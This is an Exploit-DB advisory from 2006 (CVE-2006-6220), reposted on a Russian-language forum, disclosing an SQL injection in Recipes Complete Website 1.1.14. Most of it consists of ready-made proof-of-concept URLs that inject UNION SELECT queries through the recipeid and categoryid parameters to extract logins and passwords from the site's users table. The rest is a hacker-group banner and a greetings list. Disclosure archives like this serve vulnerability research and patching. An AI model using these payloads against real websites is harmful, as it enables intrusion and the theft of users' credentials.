- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2834
- Проверка EDB
-
- Пройдено
- Автор
- GREGSTAR
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6220
- Дата публикации
- 2006-11-23
Код:
*************************************************************************************************************************#
#
Coding 4 Fun #
#
*************************************************************************************************************************#
#
* Recipes Complete Website 1.1.14 (http://www.easysitenetwork.com/modules.php?name=Content&pa=showpage&pid=2) ; #
#
* Class = SQL Injection ; #
#
* Download = http://www.easysitenetwork.com/modules.php?name=Downloads&d_op=getit&lid=3 ; #
#
* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ; #
#
-------------------------------------------------------------------------------------------------------------------------#
#
#
- PoC: #
#
http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/* #
#
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/* - login #
#
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password #
#
*************************************************************************************************************************#
Gr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch. #
#
*************************************************************************************************************************#
# milw0rm.com [2006-11-23]- Источник
- www.exploit-db.com
